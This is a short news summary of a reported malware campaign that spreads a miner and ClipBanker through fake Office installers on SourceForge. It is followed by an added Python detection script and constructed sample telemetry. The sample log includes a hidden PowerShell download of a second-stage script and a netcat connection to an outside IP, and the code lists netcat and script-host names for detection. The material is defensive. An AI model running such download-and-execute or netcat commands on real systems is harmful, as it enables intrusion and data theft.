As per reports, a sophisticated malware campaign has been uncovered by Kaspersky, leveraging SourceForge (a popular software hosting service) to distribute cracked Microsoft Office installers laced with cryptocurrency mining and clipper malware. Posing as Office add-ins, the Officepackage project reportedly redirects users through deceptive links to malicious downloads hosted off-site.
• Once installed, the malware executes a chain of scripts that download the miner and ClipBanker payloads, send system data via the Telegram API, and establish encrypted connections using netcat.
• Attackers also distribute a malware downloader dubbed TookPS via fake websites mimicking DeepSeek AI and other legitimate software, delivered through sponsored Google ads.
• Additionally, malicious ads for VMware’s RVTools have been used to deliver a modified version of Thundershell, a PowerShell-based remote access tool, further illustrating threat actors’ evolving use of open-source platforms to exploit user trust and gain access to targeted systems.
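The behaviours described in the first bullet (a script chain that fetches payloads, sends system data through the Telegram API, and opens connections with netcat) are the kind a defender can hunt for in process and network telemetry. The following Python is an added example written for this summary; it is not code from Kaspersky's report or from any of the campaigns described. The event format, the field names, the hostnames, the IP address and the sample log lines are all constructed for illustration, and the rules are deliberately simple so the logic is easy to read and adapt.

```python
"""
Added example (not from the report or the campaigns described): three simple
detection rules run over constructed process/network events.

Constructed event format, one event per line:
  <ts> proc=<image> parent=<image> cmd="<command line>" dst=<destination host>
"""
import re
from dataclasses import dataclass

EVENT_RE = re.compile(
    r'^(?P<ts>\S+) proc=(?P<proc>\S+) parent=(?P<parent>\S+) '
    r'cmd="(?P<cmd>[^"]*)" dst=(?P<dst>\S*)$'
)

# Assumed allow/deny lists; tune these to the environment being monitored.
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
NETCAT_NAMES = {"nc.exe", "nc64.exe", "ncat.exe", "netcat.exe"}
EXPECTED_TELEGRAM_CLIENTS = {"chrome.exe", "msedge.exe", "firefox.exe", "telegram.exe"}
TELEGRAM_API = "api.telegram.org"


@dataclass
class Finding:
    rule: str
    ts: str
    proc: str
    detail: str


def parse_event(line):
    """Return the event fields as a dict, or None if the line does not match."""
    m = EVENT_RE.match(line.strip())
    return m.groupdict() if m else None


def check_event(ev):
    """Apply the three rules to one parsed event and return any findings."""
    findings = []
    proc, parent, dst = ev["proc"].lower(), ev["parent"].lower(), ev["dst"].lower()

    # Rule 1: the Telegram Bot API reached by something that is neither a browser
    # nor the Telegram client, i.e. a plausible out-of-band data channel.
    if dst == TELEGRAM_API and proc not in EXPECTED_TELEGRAM_CLIENTS:
        findings.append(Finding("telegram_api_from_non_browser", ev["ts"], ev["proc"], f"dst={dst}"))

    # Rule 2: a netcat binary started by a script host.
    if proc in NETCAT_NAMES and parent in SCRIPT_HOSTS:
        findings.append(Finding("netcat_from_script_host", ev["ts"], ev["proc"], f"parent={parent}"))

    # Rule 3: a script host spawned by another script host with a URL on its
    # command line, the shape of a multi-stage download chain.
    if proc in SCRIPT_HOSTS and parent in SCRIPT_HOSTS and re.search(r"https?://", ev["cmd"]):
        findings.append(Finding("script_chain_with_url", ev["ts"], ev["proc"], ev["cmd"]))

    return findings


def scan(lines):
    """Parse every line and collect findings in log order; unparseable lines are skipped."""
    out = []
    for line in lines:
        ev = parse_event(line)
        if ev:
            out.extend(check_event(ev))
    return out


# Constructed sample telemetry: two benign events and three that should fire.
SAMPLE_LOG = [
    '2025-04-08T10:00:01Z proc=msedge.exe parent=explorer.exe cmd="msedge.exe" dst=api.telegram.org',
    '2025-04-08T10:02:10Z proc=cmd.exe parent=wscript.exe cmd="cmd.exe /c powershell -w hidden -c iwr https://example.invalid/stage2.ps1" dst=',
    '2025-04-08T10:02:12Z proc=powershell.exe parent=cmd.exe cmd="powershell -w hidden" dst=api.telegram.org',
    '2025-04-08T10:02:15Z proc=nc.exe parent=cmd.exe cmd="nc.exe 203.0.113.5 443" dst=203.0.113.5',
    '2025-04-08T10:05:00Z proc=chrome.exe parent=explorer.exe cmd="chrome.exe" dst=example.org',
]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.ts} {f.rule:32} {f.proc:16} {f.detail}")
```

Run against the constructed sample, the scan yields three findings in log order (the script chain, the Telegram API contact from PowerShell, and netcat launched from cmd.exe) while the two browser events pass. In a real deployment the same rules would be fed from EDR or proxy logs, and the allow-list for Telegram clients would need to reflect what is actually sanctioned on the host.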